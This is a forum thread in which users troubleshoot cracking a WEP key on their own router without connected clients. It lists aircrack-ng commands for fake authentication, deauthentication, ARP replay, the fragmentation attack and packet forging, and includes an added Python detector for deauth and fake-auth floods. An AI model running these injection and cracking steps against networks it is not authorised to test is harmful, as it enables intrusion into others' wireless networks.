Thread: WEP cracking no client

  1. #1
    Just burned his ISO, joined Feb 2006, 3 posts

    WEP cracking no client

    So I am trying to crack my own WEP key without any clients connected. I have my router up and set up. The problem is that I don't get any ARPs when I am listening for ARPs. How can I generate traffic? I have read all around the forum and I still don't get an answer whether this can be done. Some people say yes, others no, others that you need two laptops (which I have access to if needed). Anyway, these are the commands that I use. The card can inject traffic no problem.
    - airodump-ng -w ivs -c 6 ath1
    - aireplay-ng -1 30 -e essid -b bssid -h myfakemac ath1 (fake auth because no clients)
    - aireplay-ng -3 -e essid -b bssid -h myfakemac ath1 (listening for arps)
    Until this point everything is OK. I know that fakeauth does not generate traffic.
    Some people seem to think that the following is to perform the deauth attack to generate traffic, however this doesn't seem to work. At least not for me. So this is what I do next.
    - aireplay-ng -0 15 -b bssid -c myfakemac ath1 (when I do this attack I start getting deauth packets of course, but no traffic or arp is generated)
    And I wait and wait and wait and wait!!! Airodump seems to grab data packets, but aireplay doesn't get any ARPs. Any comments? Am I doing something wrong? Thanks for the reply, everybody.

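    A defender-side counterpart to the traffic-generation steps above, as an added example that is not from the thread: it parses 802.11 management frame headers and flags the repeated fake-authentication (-1) and deauthentication (-0) patterns a wireless IDS would look for. The BSSID, station MAC, frame counts and thresholds are constructed.

```python
"""Detect the two injection patterns from the thread (repeated fake
authentication and a deauth flood) in 802.11 management frame headers.
Added example for defenders; frames and thresholds are constructed."""
import struct
from collections import Counter

DEAUTH, AUTH, BEACON = 0xC0, 0xB0, 0x80   # frame-control byte 0: mgmt type, subtype 12/11/8
DEAUTH_THRESHOLD = 10   # deauths per (sender, BSSID) treated as a flood (constructed value)
AUTH_THRESHOLD = 5      # auth requests per (station, BSSID) treated as a burst (constructed)

def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def build_frame(subtype, dst, src, bssid):
    """Constructed 24-byte 802.11 MAC header: FC, duration, addr1-3, seq-ctl."""
    return struct.pack("<BBH6s6s6sH", subtype, 0, 0, dst, src, bssid, 0)

def parse_header(frame):
    """Return (subtype byte with version bits masked, addr1, addr2, addr3)."""
    fc0, _fc1, _dur, a1, a2, a3 = struct.unpack("<BBH6s6s6s", frame[:22])
    return fc0 & 0xFC, mac(a1), mac(a2), mac(a3)

def detect(frames):
    """Count deauth and auth frames per (addr2, addr3) and return alert strings."""
    deauth, auth = Counter(), Counter()
    for frame in frames:
        sub, _dst, src, bssid = parse_header(frame)
        if sub == DEAUTH:
            deauth[(src, bssid)] += 1   # spoofed deauths carry the AP's own address
        elif sub == AUTH:
            auth[(src, bssid)] += 1
    alerts = [f"deauth flood: {n} frames from {s} on {b}"
              for (s, b), n in deauth.items() if n >= DEAUTH_THRESHOLD]
    alerts += [f"auth burst: {n} requests from {s} on {b}"
               for (s, b), n in auth.items() if n >= AUTH_THRESHOLD]
    return alerts

def sample_frames():
    """Constructed capture: beacons, a fake-auth burst, and a deauth flood."""
    ap = bytes.fromhex("02aabbccdd01")      # constructed BSSID
    fake = bytes.fromhex("02aabbccdd99")    # constructed injecting station
    frames = [build_frame(BEACON, b"\xff" * 6, ap, ap) for _ in range(20)]
    frames += [build_frame(AUTH, ap, fake, ap) for _ in range(6)]
    frames += [build_frame(DEAUTH, fake, ap, ap) for _ in range(12)]
    return frames

if __name__ == "__main__":
    for line in detect(sample_frames()):
        print(line)
```

Beacons are parsed but never counted, so a healthy capture produces no alerts; only the management subtypes the thread's commands emit are tallied.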
  2. #2
    Junior Member, joined Feb 2006, 75 posts

    Quote Originally Posted by hol64:
    So I am trying to crack my own WEP key without any clients connected. I have my router up and set up. The problem is that I don't get any ARPs when I am listening for ARPs. How can I generate traffic? I have read all around the forum and I still don't get an answer whether this can be done. Some people say yes, others no, others that you need two laptops (which I have access to if needed). Anyway, these are the commands that I use. The card can inject traffic no problem.
    - airodump-ng -w ivs -c 6 ath1
    - aireplay-ng -1 30 -e essid -b bssid -h myfakemac ath1 (fake auth because no clients)
    - aireplay-ng -3 -e essid -b bssid -h myfakemac ath1 (listening for arps)
    Until this point everything is OK. I know that fakeauth does not generate traffic.
    Some people seem to think that the following is to perform the deauth attack to generate traffic, however this doesn't seem to work. At least not for me. So this is what I do next.
    - aireplay-ng -0 15 -b bssid -c myfakemac ath1 (when I do this attack I start getting deauth packets of course, but no traffic or arp is generated)
    And I wait and wait and wait and wait!!! Airodump seems to grab data packets, but aireplay doesn't get any ARPs. Any comments? Am I doing something wrong? Thanks for the reply, everybody.

    It's been a long time since I've done any WEP cracking, but something I did try, and I can't clearly remember if it was successful, but I think it was: I had 2 laptops, but you can probably do it with 1 laptop with 2 wifi devices.

    On the second laptop, try connecting to the AP and enter any random WEP key just to generate ARP requests (or at least try to). Just make sure you have the correct MAC of the second laptop or second wifi device and use that MAC in aireplay to inject traffic, deauth and fakeauth.

    Are you using BT2 Final or an older version? Hope this helps, post back progress.

  3. #3
    Junior Member, joined Feb 2007, 73 posts

    Another thing you may want to try is a fragmentation attack via aireplay. It's a new feature added to the aircrack-ng 0.7 suite. Very nice feature, I may add. This will create a xor file that can be used with packetforge.

    Try something like this after using FakeAuth of course:

    aireplay-ng -5 -b <APMAC> -h <YOURMAC> <iface>

    This will create the xor file for next step.

    packetforge-ng -0 -a <APMAC> -h <YOURMAC> -k 255.255.255.255 -l 255.255.255.255 -y <file.xor> -w arp-request

    This creates an ARP request to be used with aireplay:

    aireplay-ng -2 -r arp-request <iface>

    Works like a charm for me. Actually I think it works faster than having to wait for an ARP packet. Hope this helps!

  4. #4
    Just burned his ISO, joined Feb 2006, 3 posts

    Thanks for your reply. I had gone to the aircrack-ng webpage and their updated documentation. They had the fragmentation attack, which worked really well.

  5. #5
    Just burned his ISO, joined Mar 2007, 2 posts

    Hi all,
    I'm trying to use the fragmentation attack but I remain in "Read packet" status (>10,000 packets read).
    Previously I do the following steps:
    airmon-ng start wifi0 (channel)
    ifconfig ath0 up
    iwconfig ath0 mode Monitor channel (number of channel)
    aireplay-ng -1 0 -e (ESSID) -a (ap mac) -h (my mac) ath0
    (association works fine)
    aireplay-ng -5 -b (ap mac) -h (my mac) ath0
    (wait...wait...wait........)
    Why?

    Thanks for help

  6. #6

    Well, that's better than my problem. I create TONS of fast traffic, but it all doesn't mean anything, it's all garbage. I run aircrack and see what key it's attempting, and it's nowhere near my key. I can't break my router's key if I set it to be 64(40) bit, but 128(104) no way, even with 1.5 million IVs.
